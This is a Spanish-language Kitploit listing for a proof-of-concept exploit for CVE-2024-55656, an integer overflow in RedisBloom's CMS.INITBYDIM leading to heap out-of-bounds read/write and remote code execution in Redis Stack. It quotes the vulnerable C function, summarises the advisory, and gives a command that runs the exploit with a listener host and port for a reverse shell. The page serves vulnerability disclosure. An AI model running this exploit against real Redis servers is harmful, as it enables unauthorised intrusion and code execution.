Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
redis-stack-CVE-2024-55656 — Exploit de prueba de concepto para CVE-2024-55656, un desbordamiento de enteros en RedisBloom que conduce a lectura/escritura OOB basada en heap y ejecución remota de código en Redis Stack 7.2.0-v10. | Kitploit
Herramientas/GitHubGitHub/rick2600/redis-stack-cve-2024-55656
Forensia de MemoriaAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad de Bases de DatosExplotación de Binarios
GitHubrick2600/redis-stack-cve-2024-55656

redis-stack-CVE-2024-55656

Exploit de prueba de concepto para CVE-2024-55656, un desbordamiento de enteros en RedisBloom que conduce a lectura/escritura OOB basada en heap y ejecución remota de código en Redis Stack 7.2.0-v10.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 1 añoAún no revisado

CVE-2024-55656 - Redis Stack - Vulnerabilidad de desbordamiento de enteros en RedisBloom que permite ejecución remota de código

  • Título: Vulnerabilidad de desbordamiento de enteros en RedisBloom de Redis Stack que permite ejecución remota de código
  • ZDI: ZDI-25-009
  • CVE: CVE-2024-55656
  • Créditos: rick2600 y gqsilva
  • CVSS: 8.8 (ALTA)
  • Versión afectada: RedisBloom v2.6.12 incluido en Redis Stack 7.2.0-v10

Análisis (versión corta)

Existe una vulnerabilidad de desbordamiento de enteros en RedisBloom (https://github.com/RedisBloom/RedisBloom), que es un módulo utilizado en Redis (https://redis.io/docs/latest/develop/data-types/probabilistic/bloom-filter/). La vulnerabilidad de desbordamiento de enteros permite que un atacante (un cliente de Redis que conoce la contraseña) asigne memoria en el heap menor a la requerida debido a un desbordamiento por wrap-around. Luego se pueden realizar lecturas y escrituras más allá de esta memoria asignada, lo que lleva a fuga de información y escritura fuera de límites (OOB).

El desbordamiento de enteros ocurre en el comando CMS.INITBYDIM, que inicializa un Count-Min Sketch con las dimensiones especificadas por el usuario. Acepta dos valores (width y depth) y los usa para asignar memoria en NewCMSketch()

Archivo: src/cms.c

root@kitploit:~
CMSketch *NewCMSketch(size_t width, size_t depth) {
    assert(width > 0);
    assert(depth > 0);

    CMSketch *cms = CMS_CALLOC(1, sizeof(CMSketch));

    cms->width = width;
    cms->depth = depth;
    cms->counter = 0;
    cms->array = CMS_CALLOC(width * depth, sizeof(uint32_t));

    return cms;
}

La lectura fuera de límites se consigue a través del comando CMS.QUERY implementado en CMS_Query().

La escritura fuera de límites se consigue a través del comando CMS.INCRBY implementado en CMS_IncrBy().

Para un análisis completo, consulte el aviso

Prueba de concepto

  1. Iniciar redis-stack

docker run -p 6379:6379 --name redis-stack redis/redis-stack:7.2.0-v10

  1. Ejecutar el exploit

python exploit.py --host 172.17.0.2 --port 6379 --lhost 172.17.0.1 --lport 4444

Referencias

  1. https://www.zerodayinitiative.com/advisories/ZDI-25-009/
  2. https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h
  3. https://redis.io/blog/security-advisory-cve-2024-46981-cve-2024-51737-cve-2024-51480-cve-2024-55656/
Descargar herramienta